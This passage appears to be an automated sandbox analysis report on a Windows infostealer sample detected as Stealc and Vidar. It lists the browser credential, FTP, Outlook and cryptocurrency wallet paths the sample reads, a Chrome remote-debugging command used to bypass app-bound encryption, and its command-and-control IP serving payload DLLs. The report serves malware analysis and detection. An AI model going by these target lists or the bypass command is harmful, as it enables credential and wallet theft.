Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: DbMBWMxoNv.exe, 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\DbMBWMxoNv.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\DbMBWMxoNv.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Source: Yara match

File source: Process Memory Space: DbMBWMxoNv.exe PID: 6456, type: MEMORYSTR

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Users\user\Desktop\DbMBWMxoNv.exe

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"

Yara detected Stealc

Source: Yara match	File source: 0.2.DbMBWMxoNv.exe.2f60e67.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DbMBWMxoNv.exe.2f60e67.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.DbMBWMxoNv.exe.48f0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DbMBWMxoNv.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.DbMBWMxoNv.exe.48f0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1909388825.0000000002D18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1909531684.0000000002F60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1335353461.00000000048F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: DbMBWMxoNv.exe PID: 6456, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: DbMBWMxoNv.exe PID: 6456, type: MEMORYSTR

Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6D010D60 sqlite3_bind_parameter_name,	0_2_6D010D60
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6D010C40 sqlite3_bind_zeroblob,	0_2_6D010C40
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CF38EA0 sqlite3_clear_bindings,	0_2_6CF38EA0
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6D010B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	0_2_6D010B40
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CF36410 bind,WSAGetLastError,	0_2_6CF36410
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CF360B0 listen,WSAGetLastError,	0_2_6CF360B0
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CF36070 PR_Listen,	0_2_6CF36070
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CF3C050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,	0_2_6CF3C050
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CF3C030 sqlite3_bind_parameter_count,	0_2_6CF3C030
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CEC22D0 sqlite3_bind_blob,	0_2_6CEC22D0
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CF363C0 PR_Bind,	0_2_6CF363C0

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Create Account	1 Extra Window Memory Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	111 Process Injection	3 Obfuscated Files or Information	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Remote Access Software	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	22 Software Packing	NTDS	146 System Information Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	1 Query Registry	SSH	Keylogging	114 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	131 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Extra Window Memory Injection	DCSync	131 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Masquerading	Proc Filesystem	12 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	131 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	111 Process Injection	Network Sniffing	1 Remote System Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	Stripped Payloads	Input Capture	1 System Network Configuration Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label
DbMBWMxoNv.exe	61%	ReversingLabs	Win32.Trojan.Stealc
DbMBWMxoNv.exe	100%	Avira	HEUR/AGEN.1312567
DbMBWMxoNv.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\ProgramData\chrome.dll	4%	ReversingLabs
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\LedgerUpdater[1].exe	55%	ReversingLabs	Win32.Trojan.Jalapeno
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\vcruntime140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\RoamingEBFBKKJECA.exe	55%	ReversingLabs	Win32.Trojan.Jalapeno

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://anglebug.com/4633	0%	URL Reputation	safe
https://anglebug.com/7382	0%	URL Reputation	safe
https://deff.nelreports.net/api/report?cat=msn	0%	URL Reputation	safe
http://polymer.github.io/AUTHORS.txt	0%	URL Reputation	safe
https://ogs.google.com/widget/callout?eom=1	0%	URL Reputation	safe
http://anglebug.com/6929	0%	URL Reputation	safe
https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLK	0%	URL Reputation	safe
https://anglebug.com/7246	0%	URL Reputation	safe
https://anglebug.com/7369	0%	URL Reputation	safe
https://anglebug.com/7489	0%	URL Reputation	safe
https://drive-daily-2.corp.google.com/	0%	URL Reputation	safe
http://polymer.github.io/PATENTS.txt	0%	URL Reputation	safe
https://issuetracker.google.com/161903006	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://drive-daily-5.corp.google.com/	0%	URL Reputation	safe
http://anglebug.com/4722	0%	URL Reputation	safe
https://m.google.com/devicemanagement/data/api	0%	URL Reputation	safe
http://anglebug.com/3502	0%	URL Reputation	safe
http://anglebug.com/3623	0%	URL Reputation	safe
http://anglebug.com/3625	0%	URL Reputation	safe
http://anglebug.com/3624	0%	URL Reputation	safe
http://anglebug.com/3862	0%	URL Reputation	safe
https://docs.rs/getrandom#nodejs-es-module-support	0%	URL Reputation	safe
http://anglebug.com/4836	0%	URL Reputation	safe
https://issuetracker.google.com/issues/166475273	0%	URL Reputation	safe
http://anglebug.com/3970	0%	URL Reputation	safe
https://apis.google.com	0%	URL Reputation	safe
http://polymer.github.io/CONTRIBUTORS.txt	0%	URL Reputation	safe
http://anglebug.com/5901	0%	URL Reputation	safe
http://anglebug.com/3965	0%	URL Reputation	safe
https://anglebug.com/7161	0%	URL Reputation	safe
https://anglebug.com/7162	0%	URL Reputation	safe
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.	0%	URL Reputation	safe
http://anglebug.com/5906	0%	URL Reputation	safe
http://anglebug.com/2517	0%	URL Reputation	safe
http://anglebug.com/4937	0%	URL Reputation	safe
https://issuetracker.google.com/166809097	0%	URL Reputation	safe
http://anglebug.com/3832	0%	URL Reputation	safe
https://drive-daily-0.corp.google.com/	0%	URL Reputation	safe
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
chrome.cloudflare-dns.com	172.64.41.3	true	false	unknown
plus.l.google.com	142.250.186.46	true	false	unknown
play.google.com	216.58.206.78	true	false	unknown
ssl.bingadsedgeextension-prod-europe.azurewebsites.net	94.245.104.56	true	false	unknown
sb.scorecardresearch.com	18.244.18.27	true	false	unknown
www.google.com	142.250.186.132	true	false	unknown
googlehosted.l.googleusercontent.com	172.217.16.129	true	false	unknown
clients2.googleusercontent.com	unknown	unknown	true	unknown
bzib.nelreports.net	unknown	unknown	true	unknown
assets.msn.com	unknown	unknown	true	unknown
c.msn.com	unknown	unknown	true	unknown
ntp.msn.com	unknown	unknown	true	unknown
apis.google.com	unknown	unknown	true	unknown
api.msn.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Reputation
http://62.204.41.163/1d1758bf3d6d1a39/msvcp140.dll	true	unknown
http://62.204.41.163/1d1758bf3d6d1a39/sqlite3.dll	true	unknown
https://sb.scorecardresearch.com/b2?rn=1730573530887&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=1CE105B96555657E15301092645D6402&cs_fpit=o&cs_fpdm=null&cs_fpdt=null	false	unknown
https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw	false	unknown
https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1730573534557&w=0&anoncknm=app_anon&NoResponseBody=true	false	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://62.204.41.163/c882d91d1df1bdb3.phpor	DbMBWMxoNv.exe, 00000000.00000002.1925652686.0000000023550000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b	chrome.exe, 00000004.00000002.1601561378.00001B4400784000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://anglebug.com/4633	chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://google-ohttp-relay-join.fastly-edge.com/zx	chrome.exe, 00000004.00000003.1496382973.00001B44016A4000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://anglebug.com/7382	chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://google-ohttp-relay-join.fastly-edge.com/Yx	chrome.exe, 00000004.00000003.1496382973.00001B44016A4000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://deff.nelreports.net/api/report?cat=msn	2cc80dabc69f58b6_0.10.dr, Reporting and NEL.11.dr	false	URL Reputation: safe	unknown
http://polymer.github.io/AUTHORS.txt	chrome.exe, 00000004.00000002.1630231675.00001B4400987000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1465464291.00001B440120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1465029159.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1463041147.00001B4401024000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1463190127.00001B4401050000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1463111717.00001B4401084000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1465288052.00001B44003A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1464974123.00001B4400C70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1463142331.00001B4400F2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1463086803.00001B4401034000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1465388538.00001B44010F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1633459175.00001B4400D64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1465058102.00001B4400F88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1464997094.00001B4400F7C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://docs.google.com/	manifest.json0.10.dr	false		unknown
http://anglebug.com/3452A	chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://62.204.41.163pData	DbMBWMxoNv.exe, 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmp	false		unknown
http://unisolated.invalid/	chrome.exe, 00000004.00000002.1630327314.00001B4400990000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://photos.google.com?referrer=CHROME_NTP	chrome.exe, 00000004.00000003.1465464291.00001B440120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1465288052.00001B44003A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1465388538.00001B44010F0000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://ogs.google.com/widget/callout?eom=1	chrome.exe, 00000004.00000002.1636762700.00001B4401430000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1491004628.00001B4401498000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1491053954.00001B44014A0000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://62.204.41.163	DbMBWMxoNv.exe, 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmp	true		unknown
http://anglebug.com/6929	chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLK	DbMBWMxoNv.exe, 00000000.00000003.1807489117.0000000023913000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://anglebug.com/7246	chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
